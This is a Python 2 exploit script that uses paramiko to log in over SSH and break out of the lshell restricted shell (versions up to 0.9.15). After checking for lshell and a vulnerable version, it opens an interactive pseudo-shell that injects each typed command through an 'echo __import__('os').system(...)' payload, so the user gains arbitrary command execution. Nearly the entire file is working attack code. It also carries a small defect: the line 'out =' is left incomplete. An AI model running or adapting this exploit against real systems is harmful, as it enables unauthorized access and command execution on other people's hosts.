import paramiko import traceback from time import sleep import sys # # Exploit lshell pathing vulnerability in <= 0.9.15. # Runs commands on the remote system. # @dronesec # if len(sys.argv) < 4: print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0]) sys.exit(1) try: print '[!] .............................' print '[!] lshell <= 0.9.15 remote shell.' print '[!] note: you can also ssh in and execute \'/bin/bash\'' print '[!] .............................' print '[!] Checking host %s...'%(sys.argv[3]) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if len(sys.argv) == 5: ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2]) else: ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2]) # verify lshell channel = ssh.invoke_shell() while not channel.recv_ready(): sleep(1) ret = channel.recv(2048) channel.send('help help\n') while not channel.recv_ready(): sleep(1) ret = channel.recv(2048) if not 'lshell' in ret: if 'forbidden' in ret: print '[-] Looks like we can\'t execute SSH commands' else: print '[-] Environment is not lshell' sys.exit(1) # verify vulnerable version channel.send('sudo\n') while not channel.recv_ready(): sleep(1) ret = channel.recv(2048) if not 'Traceback' in ret: print '[-] lshell version not vulnerable.' sys.exit(1) channel.close() ssh.close() # exec shell print '[+] vulnerable lshell found, preparing pseudo-shell...' if len(sys.argv) == 5: ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2]) else: ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2]) while True: cmd = raw_input('$ ') # breaks paramiko if cmd[0] is '/': print '[!] Running binaries won\'t work!' continue cmd = cmd.replace("'", r"\'") cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t')) if len(cmd) > 1: if 'quit' in cmd or 'exit' in cmd: break (stdin,stdout,stderr) = ssh.exec_command(cmd) out = print out.strip() except paramiko.AuthenticationException: print '[-] Authentication to %s failed.'%sys.argv[3] except Exception, e: print '[-] Error: ', e print type(e) traceback.print_exc(file=sys.stdout) finally: channel.close() ssh.close()